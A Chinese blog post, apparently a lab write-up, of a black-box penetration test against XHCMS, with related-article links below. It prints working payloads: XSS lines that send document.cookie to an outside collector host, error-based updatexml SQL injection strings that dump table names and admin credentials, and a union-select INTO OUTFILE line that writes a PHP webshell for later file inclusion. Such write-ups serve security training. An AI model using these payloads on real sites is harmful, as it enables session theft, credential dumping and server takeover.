XHCMS渗透测试

最新推荐文章于 2023-12-08 17:37:50 发布
最新推荐文章于 2023-12-08 17:37:50 发布
阅读量391 收藏 1
点赞数
文章标签: php mysql apache
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kiihuang/article/details/129811478
版权

熊海这次是黑盒渗透测试

域名扫描:御剑

1、XSS存储型漏洞

 消除<script>

 经过尝试,存在名称中

<a href='javascript:location.href="http://192.168.18.141/sefa15/xss/getcookie.php?url="%2Blocation.href%2B"%26cookie="%2Bdocument.cookie'>huang</a>

传输cookie成功

 

修改一下

使用beef更加方便

广泛存在,在管理员登录页面中,文章和广告都有

2、get cid存在

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: r=content&cid=18 AND (SELECT 4468 FROM(SELECT COUNT(*),CONCAT(0x71626b6b71,(SELECT (ELT(4468=4468,1))),0x7176767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
简化一下:and updatacml(1,concet(0x7f,database(),0x7f),1)
获取表名:and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema in (0x7868636d73)),0x7e),1)
显示结果少了一部分
进行改进:and updatexml(1,concat(0x7e,(select mid(group_concat(table_name),62,30) from information_schema.tables where table_schema in (0x7868636d73)),0x7e),1)
获取全部表名
获取字段:and updatexml(1,concat(0x7e,(select mid(group_concat(column_name),1,32) from information_schema.columns where table_name in (0x73656e696f72736574)),0x7e),1)
改进: and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name in (0x73656e696f72736574) limit 0,1),0x7e),1)
获取详细信息:and updatexml(1,concat(0x7e,(select concat_ws(9,user,password) from xhcms.manage limit 0,1),0x7e),1)

 

报错注入,存在,可以获取全部信息

后面的post,留言功能等也都存在,sql报错注入

此外,管理员登录页面也存在sql注入点

全部都是报错注入

管理员用户登录的账号处,没有单引号过滤,可以使用联合查询,同时可以植入木马,在使用文件包含进行读取

管理员登录植入木马:admin' union select 1,2,3,4,5,6,7,'' into outfile '/tmp/mu.php'--+

3、验证码绕过存在

 

 4、XSS反射型

 

http://192.168.18.182:82/?r=download&page=1<script>location.href=http://192.168.18.141/sefa15/ssrf/cookie.php?cookie=%2Bdocument.cookie</script>

存在反射型漏洞

 5、管理员用户密码爆破

 

 缺少限制

6、CSRF

 

管理员用户修改密码处

设置一个POC,成功修改密码

 

 

7、越权

在登录管理员用户输入正确密码以后

 进行抓包可以发现,在cookie中多了一个user=admin

 尝试直接访问,admin页面,手动添加一个user=admin

 越权不行,在删除cookie后,再次使用无法进行,之前应该是使用了本地的cookie

8、文件包含

因为,存在file/ 导致php伪协议不能使用了

 

只能使用文件包含

http://192.168.18.182:82/?r=../../dashboard/phpinfo,尝试目录穿越成功

 该漏洞需要配合,管理员用户的sql注入漏洞,进行文件读取,直接读木马文件

gg_Go_game
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
yolov3 Python实现
zbr794866300的博客
09-22 980
运行环境:Ubuntu16.04 Python_opencv 3.4.4 Python3.5 #encoding: utf-8 import sys sys.path.remove('/opt/ros/kinetic/lib/python2.7/dist-packages')#ros下的冲突,若没有不需要这个语句 import numpy as np import cv2 as cv import os import time import matplotlib.pyplot as plt yolo
SQL注入漏洞演示源代码-曾是土木人
10-31
SQL注入漏洞演示源代码 更多免费资源请查看:http://download.csdn.net/user/php_fly
web渗透测试练习——熊海cms V1.0
王嘟嘟的博客
11-21 7651
0x00 前言 做一次渗透测试的练习。以及对思路进行一个总结。 0x01 start 我就随便写一点记录和笔记吧。 1.过程 首先拿到这个网站了之后,打开页面 然后第一个想法就是丢到AWVS里扫一扫,然后就挂着扫吧。 加一个 admin试试 后台到手,请忽略我之前登录尝试的东西。 随便点一点 一般我看到这种有数字的,第一个想法就是丢到sqlmap跑一跑。让它去跑吧。 然后加一个单引号试试 ...
94xhcms v1.3
04-01
94xhcms,aspcms,小巧精致cms,值得参考学习
52 代码审计-PHP项目类RCE及文件包含下载删除
山兔的博客
12-08 1050
我们拿到程序之后,你自己要去猜测程序存在那些漏洞,是根据程序自身源码,他的应用方向决定的,他的网站偏向社交,有数据的交互,就会产生注入、跨站多一点,像这个音乐的分享、播放,就是操作文件的,这里肯定是有文件上传、下载,这套程序比较偏向于找文件漏洞。文件删除漏洞不是很常见,一般我们在黑盒测试很难探针到,因为他需要有特定的访问地址,特定的参数去触发文件类的删除,需要代码去辅助你,你才知道怎么去传参,但是黑盒里面,我们无法知道,没办法测试,得不到效果,所以一般文件删除漏洞,产生在白盒测试里面。
熊海cms渗透测试
m0_64583632的博客
11-10 2025
熊海cms渗透测试
XHcms
Yu3511606536的博客
06-22 799
代码审计:XHcms
Xh_CMS渗透测试文档
Q_U_A_R_T_E_R的博客
06-20 897
在主页寻找sql注入发现是可以进行sql注入的查看相关的数据库名应该是www.ccc.com 针对数据库,查看里面的表 查看manage 得到用户名和密码admin和123456扫描网页目录发现admin登录页面
21-逻辑越权
qq_56414082的博客
03-31 1898
通过低权限账户身份的账户,发送高权限账号才能有的请求,获取更高权限的操作。垂直越权测试思路:看看低权限用户是否能越权使用高权限用户的功能,比如普通用户可以使用管理员的功能。指相同权限下不同的用户可以互相访问水平越权测试方法:主要通过看看能否通过A用户操作影响到B用户。
PHP代码审计
qq_43122583的博客
04-20 205
目录一 . 审计方法二 . 代码审计——BlueCMS1.6(1)SQL注入漏洞(2)common.fun.php的SQL注入漏洞(3)文件包含漏洞(4)一般注册会出现xss漏洞(5)修改个人资料时也会出现xss漏洞三 . 代码审计实战1. 熊海CMS代码审计(1)文件包含漏洞(2)cookies欺骗越权漏洞(3)login.php绕过登录2. PbootCMS代码审计(MVC架构)新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)--文件包含漏洞
qq_28624871的博客
03-13 5603
熊海CMS_V1.0代码审计与漏洞分析及采坑日记(一)–文件包含漏洞 前言 最近几天在给协会的学弟讲代码审计入门相关内容,便找了这个熊海CMS_V1.0来教学,结果在这个过程中遇到蛮多问题的,于是这篇文章详细记录了对熊海CMS_V1.0从搭建到审计与漏洞分析的过程,其中踩了很多坑,这些坑网上也没有什么记录,也是我之前学习过程中没有去仔细发现和研究的,果然古人诚不欺我,温故而知新,通过给学弟们讲这个简单的代码审计又学习到了很多新的内容,也欢迎阅读这篇文章的师傅们对文章出现的问题一起探讨交流,不足的地方也请多多
xhcms靶场源码,无密码,解压即用
最新发布
05-12
关于xhcms的建站源码,无毒无马,建议搭配我写的教程文章一起食用: https://blog.csdn.net/qq_51861517/article/details/138726553?spm=1001.2014.3001.5501 可用于文件包含等的漏洞实战。
94xhcms v1.3.rar
07-05
94xhcms是一套免费的ASP内容管理系统,可选择安装ACCESS版和MSSQL版 系统快速稳定,现有功能支持: 无限级分类,建立门户网站也轻而易举 模块化采集,一键实现远程文档本地化 集成自定义表单,满足各种交互...
94xhcms内容文章系统
03-25
安装方法:解压后直接运行install(如:127.0.0.1/install)进行安装。 切记,安装完毕后请手动删除install文件夹及其下所有文件。 系统支持无限级分类、采集、生成静态HTML、ajax、数据库内容替换、自定义标签...
94xhcms v1.3-ASP源码.zip
12-14
ASP源码,压缩包解压密码:www.cqlsoft.com
网安之web攻防第四十九天笔记
B_l_a_nk的博客
05-29 339
1、水平越权-同级用户权限共享 2、垂直越权-低高用户权限共享 3、访问控制-验证丢失&取消验证 4、脆弱验证-Cookie&Token&Jwt等
熊海xhcms审计
qq_53856457的博客
05-14 1412
第一次审计,抱着学习的态度,从一个初学者的角度去尝试摸石头过河,踩坑,跳坑,并做个记录吧: 文章目录一、环境安装审计过程先了解一下目录结构一、第一条检测结果 首页/后台文件包含漏洞二、sql注入/admin/files/login.php/admin/files/adset.php报警SQL注入漏洞:/admin/files/editcolumn.php**/admin/files/editlink.php**/admin/files/editsoft.php/admin/files/editwz.php/
熊海cms代码审计
0xdawn的博客
11-10 2544
0x00 前言 ​ 做这次代码审计的时候,距离看《代码审计:企业级web代码安全架构》一书已经过去了差不多一个月的时间了。借着这次机会,开启自己的代码审计之旅吧! 0x01 seay自动审计 环境搭建 本地留了一份进行源码审计,虚拟机win7下搭建作为攻击利用 本地审计 把cms丢进seay源代码审计系统里,先自动审计一番 发现34个可疑漏洞,接下来要做的就是逐一排查,以防误报 0x02 ...
$http在上传文件的同时传参数_[代码审计] xhcms 文件包含漏洞分析
weixin_42300099的博客
12-26 483
一、初识CMS:熊海CMS是由熊海开发的一款可广泛应用于个人博客,个人网站,企业网站的一套网站综合管理系统。适用于个人博客、个人网站、企业网站等各种用途,前台采用电脑、移动端两种显示模式,后台使用HML5响应式布局。目前系统已经集成:代码高亮、广告模块、文件图片上传、图片水印、图片缩略图,智能头像,互动邮件通知等。部份模块添加多种实用功能-目录结构:二、漏洞简介:程序直接将POST接收到...
xhcms csrf漏洞
09-03
抱歉,我没有找到关于xhcms的csrf漏洞的引用内容。可能是因为这个漏洞没有被广泛报道或者没有相关的公开资料。如果您对xhcms的csrf漏洞感兴趣,我建议您参考安全专家、漏洞研究人员或安全社区的讨论和报告,以获取更...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值